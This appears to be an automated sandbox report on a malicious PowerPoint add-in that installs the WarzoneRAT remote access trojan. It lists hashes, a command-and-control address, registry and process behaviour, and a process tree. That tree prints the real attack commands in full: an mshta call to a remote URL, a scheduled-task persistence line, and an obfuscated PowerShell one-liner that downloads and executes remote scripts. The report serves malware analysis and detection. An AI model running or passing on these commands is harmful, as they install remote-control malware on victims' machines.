Analysis
-
max time kernel
125s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
17-07-2021 10:03
Static task
static1
Behavioral task
behavioral1
Sample
SO-19844 EIDCO.ppam
Resource
win7v20210408
Behavioral task
behavioral2
Sample
SO-19844 EIDCO.ppam
Resource
win10v20210408
General
-
Target
SO-19844 EIDCO.ppam
-
Size
14KB
-
MD5
24dd86688a277a16ca013809c71ab8c0
-
SHA1
d3a1915ced9501a7ce269ee1ace23b4a50c8c5cd
-
SHA256
643ce9630631fdc9051b4be5b3bd9d60281885380fb2fa777379711d938c3c91
-
SHA512
89888f15eaacf0404e460830f497b2465bbaf75276e5cf5b0ae7420f50f9c00c4392479bb2cee291acbeefda71e4dd4d603b915244ed932d84608f8fc65b5119
Malware Config
Extracted
warzonerat
pstericdd.duckdns.org:9090
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2300 396 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3924 3480 powershell.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Blocklisted process makes network request 16 IoCs
Processes:
mshta.exepowershell.exeflow pid process 16 2300 mshta.exe 18 2300 mshta.exe 20 2300 mshta.exe 22 2300 mshta.exe 24 2300 mshta.exe 27 2300 mshta.exe 29 2300 mshta.exe 31 2300 mshta.exe 33 2300 mshta.exe 37 2300 mshta.exe 38 2300 mshta.exe 40 2300 mshta.exe 41 2300 mshta.exe 43 2300 mshta.exe 46 4024 powershell.exe 50 4024 powershell.exe -
Sets DLL path for service in the registry 2 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 4524 svchost.exe -
Modifies WinLogon 2 TTPs 4 IoCs
Processes:
RegAsm.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts RegAsm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\zcKBn.I = "0" RegAsm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RegAsm.exe -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes:
DW20.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2964 396 DW20.EXE POWERPNT.EXE -
Drops file in System32 directory 2 IoCs
Processes:
RegAsm.exedescription ioc process File created C:\Windows\System32\rfxvmt.dll RegAsm.exe File opened for modification C:\Windows\System32\rfxvmt.dll RegAsm.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 4024 set thread context of 4280 4024 powershell.exe RegAsm.exe PID 4024 set thread context of 4372 4024 powershell.exe aspnet_compiler.exe -
Drops file in Program Files directory 2 IoCs
Processes:
RegAsm.exedescription ioc process File created C:\Program Files\Microsoft DN1\rdpwrap.ini RegAsm.exe File created C:\Program Files\Microsoft DN1\sqlmap.dll RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2832 2300 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 396 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
POWERPNT.EXEdwwin.exepowershell.exepowershell.exeWerFault.exesvchost.exepid process 396 POWERPNT.EXE 396 POWERPNT.EXE 3636 dwwin.exe 3636 dwwin.exe 3924 powershell.exe 3924 powershell.exe 4024 powershell.exe 4024 powershell.exe 3924 powershell.exe 4024 powershell.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 2832 WerFault.exe 4024 powershell.exe 4024 powershell.exe 4024 powershell.exe 4024 powershell.exe 4524 svchost.exe 4524 svchost.exe 4524 svchost.exe 4524 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exeWerFault.exeRegAsm.exesvchost.exedescription pid process Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeDebugPrivilege 2832 WerFault.exe Token: SeDebugPrivilege 4280 RegAsm.exe Token: SeAuditPrivilege 4524 svchost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
POWERPNT.EXERegAsm.exeaspnet_compiler.exepid process 396 POWERPNT.EXE 4280 RegAsm.exe 4372 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
POWERPNT.EXEDW20.EXEmshta.exepowershell.exedescription pid process target process PID 396 wrote to memory of 2300 396 POWERPNT.EXE mshta.exe PID 396 wrote to memory of 2300 396 POWERPNT.EXE mshta.exe PID 396 wrote to memory of 2964 396 POWERPNT.EXE DW20.EXE PID 396 wrote to memory of 2964 396 POWERPNT.EXE DW20.EXE PID 2964 wrote to memory of 3636 2964 DW20.EXE dwwin.exe PID 2964 wrote to memory of 3636 2964 DW20.EXE dwwin.exe PID 2300 wrote to memory of 1764 2300 mshta.exe schtasks.exe PID 2300 wrote to memory of 1764 2300 mshta.exe schtasks.exe PID 2300 wrote to memory of 4024 2300 mshta.exe powershell.exe PID 2300 wrote to memory of 4024 2300 mshta.exe powershell.exe PID 4024 wrote to memory of 4248 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4248 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4248 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4264 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4264 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4264 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4280 4024 powershell.exe RegAsm.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe PID 4024 wrote to memory of 4372 4024 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SO-19844 EIDCO.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exemshta http://www.bitly.com/ashjdkqodasdasdasdwdhqowdh2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@0v2x.blogspot.com/p/34.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/psteric.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/1.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2300 -s 24523⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 35042⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwwin.exeC:\Windows\system32\dwwin.exe -x -s 35043⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe ((gp HKCU:\Software).cookerr)|IEX1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\??\c:\program files\microsoft dn1\rdpwrap.iniMD5
6bc395161b04aa555d5a4e8eb8320020
SHA1f18544faa4bd067f6773a373d580e111b0c8c300
SHA25623390dfcda60f292ba1e52abb5ba2f829335351f4f9b1d33a9a6ad7a9bf5e2be
SHA512679ac80c26422667ca5f2a6d9f0e022ef76bc9b09f97ad390b81f2e286446f0658524ccc8346a6e79d10e42131bc428f7c0ce4541d44d83af8134c499436daae
-
\??\c:\program files\microsoft dn1\sqlmap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\Program Files\Microsoft DN1\sqlmap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
memory/396-117-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/396-119-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/396-118-0x00007FFF9C960000-0x00007FFF9E53D000-memory.dmpFilesize
27.9MB
-
memory/396-122-0x00007FFF99700000-0x00007FFF9A7EE000-memory.dmpFilesize
16.9MB
-
memory/396-123-0x00000251CF860000-0x00000251D1755000-memory.dmpFilesize
31.0MB
-
memory/396-114-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/396-116-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/396-115-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/1764-267-0x0000000000000000-mapping.dmp
-
memory/2300-254-0x0000000000000000-mapping.dmp
-
memory/2964-317-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/2964-314-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/2964-257-0x0000000000000000-mapping.dmp
-
memory/2964-316-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/2964-315-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmpFilesize
64KB
-
memory/3636-263-0x0000000000000000-mapping.dmp
-
memory/3924-288-0x0000029027F70000-0x0000029027F72000-memory.dmpFilesize
8KB
-
memory/3924-289-0x0000029027F73000-0x0000029027F75000-memory.dmpFilesize
8KB
-
memory/3924-270-0x0000029027F30000-0x0000029027F31000-memory.dmpFilesize
4KB
-
memory/3924-279-0x0000029028100000-0x0000029028101000-memory.dmpFilesize
4KB
-
memory/4024-304-0x000002467E250000-0x000002467E253000-memory.dmpFilesize
12KB
-
memory/4024-269-0x0000000000000000-mapping.dmp
-
memory/4024-290-0x000002467E280000-0x000002467E282000-memory.dmpFilesize
8KB
-
memory/4024-291-0x000002467E283000-0x000002467E285000-memory.dmpFilesize
8KB
-
memory/4024-298-0x000002467E286000-0x000002467E288000-memory.dmpFilesize
8KB
-
memory/4024-318-0x000002467E260000-0x000002467E26D000-memory.dmpFilesize
52KB
-
memory/4280-329-0x0000000004460000-0x000000000459C000-memory.dmpFilesize
1.2MB
-
memory/4280-313-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4280-309-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4280-310-0x0000000000405E28-mapping.dmp
-
memory/4280-335-0x0000000004830000-0x00000000048B4000-memory.dmpFilesize
528KB
-
memory/4372-324-0x0000000000405E28-mapping.dmp
-
memory/4372-327-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/4372-330-0x00000000045F0000-0x000000000472C000-memory.dmpFilesize
1.2MB
-
memory/4372-334-0x0000000004850000-0x00000000048D4000-memory.dmpFilesize
528KB